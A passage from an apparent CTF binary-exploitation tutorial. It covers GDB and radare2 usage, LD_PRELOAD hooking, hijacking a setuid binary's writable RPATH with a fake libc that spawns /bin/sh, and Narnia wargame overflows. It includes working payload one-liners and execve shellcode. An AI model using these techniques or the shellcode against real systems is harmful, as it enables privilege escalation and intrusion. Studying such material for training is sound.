But this last technique filters out all NUL bytes, because bash drops them from the result of a command substitution, so you should prefer the first one (especially if you want to pass NUL bytes).

Getting inputs from network

We can use netcat nc. Basically, if your vulnerable program is listening on localhost:666 then the command line would be:

$> python -c 'print("\xef\xbe\xad\xde")' | nc -vv localhost 666

Within gdb, the point will be to run (r) the program and to connect to it from another terminal.

Keep the stdin open after injection

Most of the techniques for stdin send the exploit string to the program, and stdin is closed as soon as the input ends, so a spawned shell exits right away. This mainly happens in gets buffer overflows. The best way to keep stdin open afterwards and get an active shell is to add a cat waiting for input on its stdin. It should look like this if you go through a file:

$> (cat ./mycommands.txt; cat) | ./program

Or, if you want a shell command:

$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | ./program

Or, finally, if you are going through the network:

$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | nc -vv localhost 666

Examining Data

Examining functions

info functions command : Displays the list of functions in the debugged program

gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x00000000000005a0  _init
0x00000000000005d0  setresgid@plt
0x00000000000005e0  system@plt
0x00000000000005f0  printf@plt
0x0000000000000600  getegid@plt
0x0000000000000620  _start
0x0000000000000650  deregister_tm_clones
0x0000000000000690  register_tm_clones
0x00000000000006e0  __do_global_dtors_aux
0x0000000000000720  frame_dummy
0x000000000000072a  vuln
0x0000000000000765  main
0x00000000000007c0  __libc_csu_init
0x0000000000000830  __libc_csu_fini
0x0000000000000834  _fini

Run it before running the program, otherwise all linked functions would also be shown.

Disassembling Functions

GDB

disassemble main

GDB-Peda

pdisass main
Examining Memory

We can use the command x (for “examine”) to examine memory in any of several formats, independently of your program’s data types.

x/nfu addr
x addr
x

Use the x command to examine memory.

n, f, and u are all optional parameters that specify how much memory to display and how to format it; addr is an expression giving the address where you want to start displaying memory.

  • n, the repeat count : The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units u) to display.

  • f, the display format : The display format is one of the formats used by print, ‘s’ (null-terminated string), or ‘i’ (machine instruction). The default is ‘x’ (hexadecimal) initially. The default changes each time you use either x or print.

  • u, the unit size : The unit size is any of

  • b Bytes.

  • h Halfwords (two bytes).

  • w Words (four bytes). This is the initial default.

  • g Giant words (eight bytes).

Examining Data

Sometimes you need to know the address of a variable in order to write an arbitrary value into it.

Run gdb <program>, then p &<variablename>

We can also use

(gdb) info address variable_name
Symbol "variable_name" is static storage at 0x903278.

Find the address of a string using GDB?

(gdb) info proc map
process 930
Mapped address spaces:

   Start Addr           End Addr       Size     Offset objfile
     0x400000           0x401000     0x1000        0x0 /myapp
     0x600000           0x601000     0x1000        0x0 /myapp
     0x601000           0x602000     0x1000     0x1000 /myapp
 0x7ffff7a1c000     0x7ffff7bd2000   0x1b6000        0x0 /usr/lib64/libc-2.17.so
 0x7ffff7bd2000     0x7ffff7dd2000   0x200000   0x1b6000 /usr/lib64/libc-2.17.so
 0x7ffff7dd2000     0x7ffff7dd6000     0x4000   0x1b6000 /usr/lib64/libc-2.17.so
 0x7ffff7dd6000     0x7ffff7dd8000     0x2000   0x1ba000 /usr/lib64/libc-2.17.so

 (gdb) find 0x7ffff7a1c000,0x7ffff7bd2000,"/bin/sh"
 0x7ffff7b98489
 1 pattern found.
 (gdb) x /s 0x7ffff7b98489
 0x7ffff7b98489: "/bin/sh"
 (gdb) x /xg 0x7ffff7b98489
 0x7ffff7b98489: 0x0068732f6e69622f
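
The same search can be sketched outside GDB: find the string in the library's bytes and add the base address of the mapping. The snippet below is a Python 3 illustration that uses a synthetic byte blob instead of a real libc; find_in_mapping and fake_libc are hypothetical names, and it assumes the blob is mapped at the given base with file offset 0.

```python
def find_in_mapping(blob, needle, base):
    """Return the runtime address of every occurrence of `needle`,
    assuming `blob` is mapped at `base` with file offset 0."""
    hits, start = [], 0
    while True:
        idx = blob.find(needle, start)
        if idx == -1:
            return hits
        hits.append(base + idx)
        start = idx + 1

# Synthetic stand-in for the library contents (not real libc bytes).
fake_libc = b"\x00" * 0x40 + b"/bin/sh\x00" + b"\x00" * 0x10
LIBC_BASE = 0x7ffff7a1c000  # start of the first libc mapping in the listing above

print([hex(a) for a in find_in_mapping(fake_libc, b"/bin/sh\x00", LIBC_BASE)])

# Offset of the real hit from the transcript, relative to the mapping start.
print(hex(0x7ffff7b98489 - LIBC_BASE))
```

Knowing the offset rather than the absolute address is what matters when ASLR moves the library: the offset stays the same for a given libc build.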

Examining Frames

Here we interpret the output of GDB’s “info frame” command.

(gdb) info frame
Stack level 0, frame at 0xb75f7390:
eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a
called by frame at 0xb75f73b0
source language c++.
Arglist at 0xb75f7388, args: this=0x0
Locals at 0xb75f7388, Previous frame's sp is 0xb75f7390
Saved registers:
ebp at 0xb75f7388, eip at 0xb75f738c

  • stack level 0 : the frame number in the backtrace. 0 is the currently executing (innermost) frame, and each caller gets the next higher number.

  • frame at 0xb75f7390 : starting memory address of this stack frame

  • eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a : eip is the register for next instruction to execute (also called program counter). so at this moment, the next to execute is at “0x804877f”, which is line 16 of testing.cpp.

  • saved eip “0x804869a” is so called “return address”, i.e., the instruction to resume in caller stack frame after returning from this callee stack. It is pushed into stack upon “CALL” instruction (save it for return).

  • called by frame at 0xb75f73b0 : the address of the caller stack frame

  • source language c++ : which language in use

  • Arglist at 0xb75f7388, args: this=0x0 : the starting address of arguments

  • Locals at 0xb75f7388 : address of local variables.

  • Previous frame’s sp is 0xb75f7390 : this is where the stack pointer of the previous frame (the caller) pointed at the moment of the call. It is also the starting memory address of the called stack frame.

  • Saved registers : These are the two addresses on the callee stack, for two saved registers.

  • ebp at 0xb75f7388 : the address where the caller’s “ebp” register value is saved (note that it is the saved register value, not the address of the caller’s stack frame), i.e. the result of “PUSH %ebp”. “ebp” is usually treated as the base address for the locals of this stack frame, which are addressed by offset from it. In other words, operations on local variables all go through “ebp”, so you will see instructions like mov -0x4(%ebp), %eax.

  • eip at 0xb75f738c : the saved eip mentioned before, but here it is the stack address at which it is stored (that slot contains the return address “0x804869a”).
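
The addresses in this output are related by simple arithmetic. The Python 3 sketch below recomputes them, assuming a conventional 32-bit frame in which the call instruction pushes the return address and the function prologue then pushes ebp; the variable names are only for illustration.

```python
WORD = 4  # size of a stack slot on 32-bit x86

frame_at = 0xb75f7390                  # "frame at" from the output above

saved_eip_addr = frame_at - WORD       # return address sits just below the frame address
saved_ebp_addr = frame_at - 2 * WORD   # the caller's ebp is pushed right after it

print(hex(saved_eip_addr), hex(saved_ebp_addr))
```

This is why overwriting a local buffer towards higher addresses reaches the saved ebp first and the saved eip four bytes later.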

Examining Registers

We can refer to machine register contents, in expressions, as variables with names starting with ‘$’. The names of registers are different for each machine; use info registers to see the names used on your machine.

  • info registers : Print the names and values of all registers except floating-point registers (in the selected stack frame).

  • info all-registers : Print the names and values of all registers, including floating-point registers.

  • info registers regname … : Print the value of each specified register regname, relative to the selected stack frame. regname may be any register name valid on the machine you are using, with or without the initial ‘$’.

Setting program variable

Either

set variable i = 10

or update an arbitrary (writable) location by address

(gdb) set {int}0x83040 = 4

Radare2 Basics

r2 -Ad ./crackme0x01 : Opens r2 in debug mode with the Analyze all flag active
afll : Lists all functions and their location in memory
s sym.main : Seeks to function sym.main. Address in prompt will change
pdf : "Print Disassembly of Function", disassembles the function at the current seek
pdf @ sym.main : Same, but shows the main function without seeking to it first
iz : Shows the strings present in the data section. One can use izz to see the strings for the entire binary
db 0x12345678 : Sets a breakpoint at address 0x12345678. It's possible to set more than one breakpoint
dc : Runs the program until it hits a breakpoint
dr : Shows the content of all registers. Use dr <register> for a specific register
afvd : Shows the content of all local/args variables
pf : Prints formatted data. Use pf?? to see available formats and pf??? for examples
? 0x10 : Converts the number 0x10 to the most common bases

Appendix-II LD_PRELOAD

Hijacking Functions

Let’s say there’s a function getrand which generates a random path for the files to be stored

int getrand(char **path)
{
 char *tmp;
 int pid;
 int fd;

 srandom(time(NULL));

 tmp = getenv("TEMP");
 pid = getpid();

 asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
   'A' + (random() % 26), '0' + (random() % 10),
   'a' + (random() % 26), 'A' + (random() % 26),
   '0' + (random() % 10), 'a' + (random() % 26));

 fd = open(*path, O_CREAT|O_RDWR, 0600);
 unlink(*path);
 return fd;
}

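Looking at the function above: getpid returns the PID of the process, random supplies the random characters of the file name, and unlink deletes the file right after it is created.

We also need to check whether the binary is dynamically linked, because LD_PRELOAD only affects dynamically linked binaries.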

file /home/flagXX/flagXX
/home/flagXX/flagXX: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

If so, then we can create a C file to override the functions we want: random(), unlink() and getpid().

hacking_randomfile.c

#include <sys/types.h>

// Take control of random: every random() % n becomes 0
long random(void) {
   return 0;
}

// Stop the file being deleted
int unlink(const char *pathname) {
   (void)pathname;
   return 0;
}

// Take control of the reported PID
pid_t getpid(void) {
   return 1;
}

Now, we need to compile this with

gcc hacking_randomfile.c -o hacking_randomfile -shared -fPIC

Using gcc we’ve specified the normal input file (hacking_randomfile.c) and output file (-o hacking_randomfile), but we’ve also specified two additional options:

-shared to make a library and
-fPIC to specify Position Independent Code, which is necessary for making a shared library.

Now that we’ve built hacking_randomfile as a shared library, here’s the basic usage:

$ LD_PRELOAD="$PWD/hacking_randomfile" ./main_targetfile

SANS has written a blog about Go To The Head Of The Class: LD_PRELOAD For The Win

Important things to note

  • The function definition must match the one being overridden.

  • The function’s argument and return types must also be correct.
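
With random() pinned to 0 and getpid() pinned to 1, the file name built by getrand becomes fully predictable. The Python 3 sketch below rebuilds it from the asprintf format string shown earlier; predicted_path is a hypothetical helper, and "/tmp" merely stands in for whatever $TEMP is set to.

```python
import string

def predicted_path(temp_dir, pid, rand_values):
    """Rebuild the name getrand() produces for a given sequence of random() results."""
    alphabets = [string.ascii_uppercase, string.digits, string.ascii_lowercase,
                 string.ascii_uppercase, string.digits, string.ascii_lowercase]
    suffix = "".join(alpha[r % len(alpha)] for alpha, r in zip(alphabets, rand_values))
    return "%s/%d.%s" % (temp_dir, pid, suffix)

# The preloaded library makes random() always return 0 and getpid() return 1.
print(predicted_path("/tmp", 1, [0] * 6))
```

Because every random() call returns the same value, the unspecified evaluation order of the C function arguments does not affect the result.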

Controlling uninitialized memory with LD_PRELOAD

Dan Rosenberg has documented this technique at Controlling uninitialized memory with LD_PRELOAD. The text below is taken directly from that blog post.

A local Linux user can exercise a degree of control over uninitialized memory on the stack when executing a program. This happens because of the way the Linux linker/loader, ld.so, handles the LD_PRELOAD environment variable. This variable allows users to specify libraries to be preloaded, effectively allowing users to override functions used in a particular binary. However, regardless of whether or not libraries specified via LD_PRELOAD are actually loaded at runtime, ld.so copies the name of each library onto the stack prior to executing the program, and doesn’t clean up after itself. By specifying a very long LD_PRELOAD variable and executing a binary, a portion of the stack will be overwritten with part of the LD_PRELOAD variable during linking, and it will stay that way once execution of the program begins, even on setuid binaries, where the library itself is not loaded.

This means we can initialise the memory to something under our control:

$ export LD_PRELOAD=`python -c 'print "/bin/getflag\x0a"*1000'`

i.e. fill the stack with one thousand copies of /bin/getflag.

Then when we run flagXX with length of 1, it will almost certainly have this in the buffer already:

$ echo -ne "Content-Length: 1\n " | /home/flagXX/flagXX
sh: !getflag: command not found
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
... lots of repeats ...
sh: line 74: /bin/getfl=qm: No such file or directory

Of course, the LD_PRELOAD variable is ignored with setuid binaries, since otherwise an attacker could trivially override arbitrary functions in setuid binaries and easily take control of a system.

LIBC - Rpath

If there exists a setuid binary whose RPATH points to a directory we control, we can get code execution. Let’s first look at what RPATH is.

RPATH

rpath designates the run-time search path hard-coded in an executable file or library. Dynamic linking loaders use the rpath to find required libraries. Specifically it encodes a path to shared libraries into the header of an executable (or another shared library). This RPATH header value (so named in the Executable and Linkable Format header standards) may either override or supplement the system default dynamic linking search paths.

Libraries found through RPATH are still loaded when the binary runs setuid, whereas LD_PRELOAD is ignored in that case. So we can place our own libc.so.6 (using version GLIBC_2.0, as required by the binary) in the RPATH directory and hook any of the functions the binary uses to execute our setuid shell.

We can use readelf to check the dynamic section of a binary

readelf -d flagXX

Dynamic section at offset 0xf20 contains 21 entries:
 Tag        Type                         Name/Value
0x00000001 (NEEDED)                     Shared library: [libc.so.6]
0x0000000f (RPATH)                      Library rpath: [/var/tmp/flagXX]
0x0000000c (INIT)                       0x80482c0

In the above example, we can see that RPATH is defined as /var/tmp/flagXX, so the binary tries to load the libc.so.6 from that location.
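
Checking whether an RPATH directory is usable can be scripted. The Python 3 sketch below parses readelf -d style text and reports whether each directory is writable by the current user. The sample text is copied from the output above, rpath_dirs is a hypothetical helper, and the regular expression assumes the usual "Library rpath: [...]" or "Library runpath: [...]" wording.

```python
import os
import re

READELF_OUTPUT = """\
 0x00000001 (NEEDED)                     Shared library: [libc.so.6]
 0x0000000f (RPATH)                      Library rpath: [/var/tmp/flagXX]
 0x0000000c (INIT)                       0x80482c0
"""

def rpath_dirs(readelf_text):
    """Return the directories listed in RPATH/RUNPATH entries of `readelf -d` output."""
    pattern = r"\((?:RPATH|RUNPATH)\)\s+Library (?:rpath|runpath): \[(.*?)\]"
    dirs = []
    for match in re.finditer(pattern, readelf_text):
        dirs.extend(match.group(1).split(":"))   # several directories are colon-separated
    return dirs

for d in rpath_dirs(READELF_OUTPUT):
    state = "writable" if os.access(d, os.W_OK) else "not writable (or missing)"
    print(d, state)
```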

Let’s see what are the functions the binary utilizes from libc

objdump -R flagXX

flagXX:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a000 R_386_JUMP_SLOT   puts
0804a004 R_386_JUMP_SLOT   __gmon_start__
0804a008 R_386_JUMP_SLOT   __libc_start_main

If the RPATH directory is writable, we can possibly get a shell by creating a fake libc.so.6 that defines its own __libc_start_main function calling

system("/bin/sh");

We may also refer to Linux x86 Program Start Up or - How the heck do we get to main()? to understand what happens when we execute a Linux binary (shared, not static).

__libc_start_main

From linuxbase: The __libc_start_main() function shall perform any necessary initialization of the execution environment, call the main function with appropriate arguments, and handle the return from main(). If the main() function returns, the return value shall be passed to the exit() function.

int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end));

__gmon_start__

The function call_gmon_start initializes the gmon profiling system. This system is enabled when binaries are compiled with the -pg flag, and creates output for use with gprof(1). In the case of the scenario binary call_gmon_start is situated directly proceeding that _start function. The call_gmon_start function finds the last entry in the Global Offset Table (also known as __gmon_start__) and, if not NULL, will pass control to the specified address. The __gmon_start__ element points to the gmon initialization function, which starts the recording of profiling information and registers a cleanup function with atexit(). In our case however gmon is not in use, and as such __gmon_start__ is NULL.

Version Reference

A dynamically linked binary records which glibc symbol versions it requires (GLIBC_2.0 in this case), so a replacement libc.so.6 has to provide the same version.

Check the glibc version required by the binary

objdump -p flagXX

flagXX:     file format elf32-i386

Version References:
 required from libc.so.6:
   0x0d696910 0x00 02 GLIBC_2.0

or

objdump -T flagXX

flagXX:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000      DF *UND* 00000000  GLIBC_2.0   puts
00000000  w   D  *UND* 00000000              __gmon_start__
00000000      DF *UND* 00000000  GLIBC_2.0   __libc_start_main
080484cc g    DO .rodata       00000004  Base        _IO_stdin_used

Check the glibc version on your Linux machine

ldd --version
ldd (Debian GLIBC 2.26-2) 2.26

If you get an error like “no version information available”, create a file version.ld (a linker version script) with the version required.

cat version.ld
GLIBC_2.0 {
};

and link it while compiling

gcc -shared -static-libgcc -fPIC -Wl,--version-script=version.ld,-Bstatic shell.c -o libc.so.6

LD_DEBUG environment variable

If the LD_DEBUG variable is set then the Linux dynamic linker will dump debug information which can be used to resolve most loading problems very quickly. To see the available options just run any program with the variable set to help, i.e.:

LD_DEBUG=help cat
Valid options for the LD_DEBUG environment variable are:

 libs        display library search paths
 reloc       display relocation processing
 files       display progress for input file
 symbols     display symbol table processing
 bindings    display information about symbol binding
 versions    display version dependencies
 all         all previous options combined
 statistics  display relocation statistics
 unused      determined unused DSOs
 help        display this help message and exit

If you want to debug a binary

LD_DEBUG=all ./flagXX
     4796:
     4796:     file=libc.so.6 [0];  needed by ./flagXX [0]
     4796:     find library=libc.so.6 [0]; searching
     4796:      search path=/var/tmp/flagXX/tls/i686/sse2/cmov:/var/tmp/flagXX/tls/i686/sse2:/var/tmp/flagXX/tls/i686/cmov:/var/tmp/flagXX/tls/i686:/var/tmp/flagXX/tls/sse2/cmov:/var/tmp/flagXX/tls/sse2:/var/tmp/flagXX/tls/cmov:/var/tmp/flagXX/tls:/var/tmp/flagXX/i686/sse2/cmov:/var/tmp/flagXX/i686/sse2:/var/tmp/flagXX/i686/cmov:/var/tmp/flagXX/i686:/var/tmp/flagXX/sse2/cmov:/var/tmp/flagXX/sse2:/var/tmp/flagXX/cmov:/var/tmp/flagXX            (RPATH from file ./flagXX)
     4796:       trying file=/var/tmp/flagXX/tls/i686/sse2/cmov/libc.so.6

ulimit

ulimit User limits - limit the use of system-wide resources.

Syntax
     ulimit [-acdfHlmnpsStuv] [limit]

Options

  -S   Change and report the soft limit associated with a resource.
  -H   Change and report the hard limit associated with a resource.

  -a   All current limits are reported.
  -c   The maximum size of core files created.
  -d   The maximum size of a process's data segment.
  -f   The maximum size of files created by the shell(default option)
  -l   The maximum size that can be locked into memory.
  -m   The maximum resident set size.
  -n   The maximum number of open file descriptors.
  -p   The pipe buffer size.
  -s   The maximum stack size.
  -t   The maximum amount of cpu time in seconds.
  -u   The maximum number of processes available to a single user.
  -v   The maximum amount of virtual memory available to the process.

ulimit provides control over the resources available to the shell and to processes started by it, on systems that allow such control.

The soft limit is the value that the kernel enforces for the corresponding resource. The hard limit acts as a ceiling for the soft limit.
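
The soft/hard distinction can be observed from a program as well. The Python 3 sketch below uses the standard resource module (Unix only) to read the core file limit and raise the soft limit to the hard ceiling, which is what ulimit -c unlimited achieves when the hard limit is itself unlimited. It only affects the Python process and its children, not the parent shell; describe is a hypothetical helper.

```python
import resource

def describe(limit):
    """Render a limit value the way ulimit does."""
    return "unlimited" if limit == resource.RLIM_INFINITY else str(limit)

soft, hard = resource.getrlimit(resource.RLIMIT_CORE)
print("core size: soft=%s hard=%s" % (describe(soft), describe(hard)))

# Raise the soft limit up to the hard limit; an unprivileged process may do this.
resource.setrlimit(resource.RLIMIT_CORE, (hard, hard))
new_soft, new_hard = resource.getrlimit(resource.RLIMIT_CORE)
print("after raise: soft=%s hard=%s" % (describe(new_soft), describe(new_hard)))
```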

Appendix-III Basic Concepts

The below has been completely taken from Binary Exploitation CTF101

Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modify the program’s functions.

Registers

A register is a location within the processor that is able to store data, much like RAM.

Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not “general purpose registers” (GPRs).

On x86-64, the only two reserved registers are

  • rip, which holds the address of the next instruction to execute, and

  • rsp, which holds the address of the stack (the stack pointer).

On x86, the same register can have different sized accesses for backwards compatibility. For example,

  • the rax register is the full 64-bit register,

  • eax is the low 32 bits of rax,

  • ax is the low 16 bits,

  • al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-15 of rax).
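
The sub-register views are plain bit masks over the full register. A short Python 3 sketch, using an arbitrary example value for rax:

```python
rax = 0x1122334455667788      # arbitrary example value

eax = rax & 0xFFFFFFFF        # low 32 bits
ax = rax & 0xFFFF             # low 16 bits
al = rax & 0xFF               # low 8 bits
ah = (rax >> 8) & 0xFF        # bits 8-15

print(hex(eax), hex(ax), hex(al), hex(ah))
```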

Stack

In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).

  • The esp/rsp register holds the address of the most recently pushed item. Because the stack grows down, this is the lowest address the stack currently occupies.

  • When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory.

  • Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).

Note: The stack “grows” down to lower memory addresses!

  • Conventionally, ebp/rbp holds the address of the base of the current stack frame (its high-address end), so local variables are sometimes referenced as an offset relative to ebp rather than an offset to esp.

  • A stack frame is essentially just the space used on the stack by a given function.
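
The push and pop behaviour described above can be modelled in a few lines. This Python 3 sketch is a toy 32-bit stack backed by a bytearray; Stack32 and the starting address 0x1000 are made up for illustration.

```python
import struct

class Stack32:
    """Toy model of a 32-bit x86 stack backed by a bytearray."""

    def __init__(self, top=0x1000):
        self.mem = bytearray(top)
        self.esp = top            # empty stack: esp is just past the highest usable address

    def push(self, value):
        self.esp -= 4             # the stack grows towards lower addresses
        struct.pack_into("<I", self.mem, self.esp, value)

    def pop(self):
        (value,) = struct.unpack_from("<I", self.mem, self.esp)
        self.esp += 4
        return value

s = Stack32()
s.push(0x11111111)
s.push(0x22222222)
print(hex(s.esp))      # two pushes moved esp down by 8 bytes
print(hex(s.pop()))    # the last value pushed comes out first
```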

Uses

The stack is primarily used for a few things:

  • Storing function arguments

  • Storing local variables

  • Storing processor state between function calls

Example

Let’s compile a simple program and check for stack

#include <stdio.h>
void say_hi(const char * name) {
   printf("Hello %s!\n", name);
}

int main(int argc, char ** argv) {
   char * name;
   if (argc != 2) {
       return 1;
   }
   name = argv[1];
   say_hi(name);
   return 0;
}

gcc -g hello.c -o hello

Put a breakpoint at the call to the say_hi function, then:

  • Check the values of esp and ebp.

  • Step through the call instruction: a call first pushes the return address (the address of the instruction following the call) onto the stack, then jumps to its destination.

  • The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be.

Calling Conventions

To be able to call functions, there needs to be an agreed-upon way to pass arguments.

In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit

cdecl

In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:

int add(int a, int b, int c) {
   return a + b + c;
}

would be invoked by pushing c, then b, then a.
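
The resulting layout at the moment the callee starts executing can be sketched as follows. This is a Python 3 model, not real machine state: cdecl_call_frame is a hypothetical helper and the return address is made up.

```python
def cdecl_call_frame(args, return_address):
    """Return (offset_from_esp, value) pairs as seen on entry to the callee."""
    stack = []                        # index 0 = lowest address = [esp]
    for value in reversed(args):      # the last argument is pushed first
        stack.insert(0, value)
    stack.insert(0, return_address)   # pushed by the call instruction itself
    return [(4 * i, v) for i, v in enumerate(stack)]

# add(1, 2, 3) with a made-up return address
for offset, value in cdecl_call_frame([1, 2, 3], 0x08048123):
    print("[esp+%d] = %#x" % (offset, value))
```

Pushing in reverse order means the first argument always ends up closest to the return address, at [esp+4] on entry.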

SysV

For 64-bit binaries, function arguments are first passed in certain registers:

RDI
RSI
RDX
RCX
R8
R9

then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
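
As a rough illustration, the Python 3 sketch below splits a list of integer or pointer arguments between the six registers and the stack. assign_sysv_args is a hypothetical helper; it ignores floating-point arguments, which use a separate set of registers.

```python
INT_ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def assign_sysv_args(args):
    """Split integer/pointer arguments into register and stack placements."""
    in_registers = dict(zip(INT_ARG_REGISTERS, args))
    on_stack = list(args[len(INT_ARG_REGISTERS):])   # lowest stack address first
    return in_registers, on_stack

regs, stack = assign_sysv_args([10, 20, 30, 40, 50, 60, 70, 80])
print(regs)
print(stack)
```

For exploitation this means a 64-bit call such as system("/bin/sh") needs the argument in rdi rather than on the stack.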

Global Offset Table

The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. Common functions (like those in libc) are “linked” into the program so they can be saved once on disk and reused by every program.

Unless a program is marked full RELRO, the resolution of a function name to its address in a dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however functions are not mapped to their actual code until they’re first called. For example, in the following C snippet puts won’t be resolved to an address in libc until after it has been called once:

int main() {
   puts("Hi there!");
   puts("Ok bye now.");
   return 0;
}

To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls “short circuit” straight to their implementation bypassing the dynamic resolver.

This has two important implications:

  • The GOT contains pointers to libraries which move around due to ASLR

  • The GOT is writable

PLT

Before a function’s address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small “stub” function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
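
Lazy binding can be pictured as a table that is patched on first use. The Python 3 sketch below is a simplified model, not how the dynamic linker is implemented: the addresses are invented, and call stands in for a call through the PLT.

```python
# Hypothetical addresses, chosen only for the illustration.
LIBC = {"puts": 0xf7e5f140}
PLT_STUB = {"puts": 0x08048300}

got = dict(PLT_STUB)      # before first use, each GOT slot points back at its PLT stub
resolver_calls = []

def call(name):
    """Model `call name@plt`: jump through the GOT, resolving on first use."""
    if got[name] == PLT_STUB[name]:
        resolver_calls.append(name)   # the dynamic linker looks the symbol up...
        got[name] = LIBC[name]        # ...and patches the GOT slot
    return got[name]

call("puts")
call("puts")
print(resolver_calls, hex(got["puts"]))
```

The resolver runs once, and because the slot is an ordinary writable pointer, anything else that can write to it redirects every later call.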

Buffer

A buffer is any allocated space in memory where data (often user input) can be stored.

In the following C program name would be considered a stack buffer:

#include <stdio.h>
#include <unistd.h>

int main() {
    char name[64] = {0};
    read(0, name, 63);   /* leave the last byte as the terminating NUL */
    printf("Hello %s", name);
    return 0;
}

Buffers could also be global variables:

#include <stdio.h>
char name[64] = {0};
int main() { code_snippet }

Or dynamically allocated on the heap like

char *name = malloc(64);
memset(name, 0, 64);

Buffer Overflow Examples

  • Let’s see a simple example of binary exploitation, Narnia0, where we have to overwrite the value of a variable.

#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef)
        system("/bin/sh");
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

In this example, the value of the variable val can be overwritten by overflowing buf: buf holds 20 bytes, but scanf accepts up to 24 characters, so the last four land in val. Typing 20 “A”s followed by the value at the prompt won’t work, because 0xdeadbeef has to arrive as four raw bytes in little-endian order (\xef\xbe\xad\xde), not as typed text. So we use Python to print the bytes. If we use

python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0

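you will see that the value matches, but the shell exits immediately because its standard input (the pipe) has already reached end-of-file. To keep the shell open, we append cat so that our keyboard input keeps being forwarded: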

(python -c 'print "A"*20 + "\xef\xbe\xad\xde"';cat) | ./narnia0
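
The one-liners above use Python 2 syntax. As a sketch of the same payload in Python 3, struct.pack can produce the little-endian bytes so they do not have to be reversed by hand. The helper emit is hypothetical; it writes raw bytes because print() would re-encode bytes above 0x7f.

```python
import struct
import sys

# 20 filler bytes for buf, then val's new contents as a little-endian 32-bit integer.
payload = b"A" * 20 + struct.pack("<I", 0xdeadbeef)

def emit(data):
    """Write raw bytes plus a newline to stdout, bypassing text encoding."""
    sys.stdout.buffer.write(data + b"\n")
    sys.stdout.buffer.flush()

print(payload.hex())   # inspect the bytes; call emit(payload) when piping into the target
```

Saved as a script that calls emit(payload), it could replace the python -c part of the pipeline, with cat still appended to keep the shell open.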

  • Another example is Narnia1:

#include <stdio.h>

int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}

We need to set an environment variable EGG containing shellcode. Initially, I tried

export EGG="\bin\sh"
and
export EGG="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

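The shellcode was taken from the Shell-Storm website. However, both failed with a segmentation fault, because inside double quotes the shell stores the escape sequences as literal characters (backslash, x, 6, a, ...) instead of raw bytes. superkojiman and barrebas helped me out and told me that if I write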

export EGG=`python -c 'print "\xCC"'`

it should raise SIGTRAP. “\xCC” acts as a software breakpoint (the INT3 instruction). It tells you whether your shellcode is stored properly and executed: if the program receives SIGTRAP, you know you have properly redirected execution to your shellcode. You can also put “\xCC” anywhere inside the shellcode; if the program crashes before reaching “\xCC”, you know that the shellcode before that point is broken, for example because of bad characters. They suggested exporting the EGG variable as

export EGG=`python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

and it worked like a charm.
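
The difference between the failing and the working export is text versus raw bytes, and the same trap exists in Python 3, where print() encodes its output as UTF-8. The sketch below shows both effects and one way to hand raw bytes to a child process through its environment. The commented-out subprocess call and its path are assumptions, not something taken from the original write-up.

```python
import os

literal = r"\x6a\x0b\x58"      # what export EGG="\x6a\x0b\x58" stores: plain ASCII characters
raw = b"\x6a\x0b\x58"          # what the CPU needs: three bytes
print(len(literal), len(raw))

# Python 3 text output is UTF-8 encoded, so a lone 0xCC would not survive print():
print("\xcc".encode("utf-8"))

shellcode = (b"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68"
             b"\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80")

# Environment values are NUL-terminated C strings, so the shellcode must not contain 0x00.
assert b"\x00" not in shellcode

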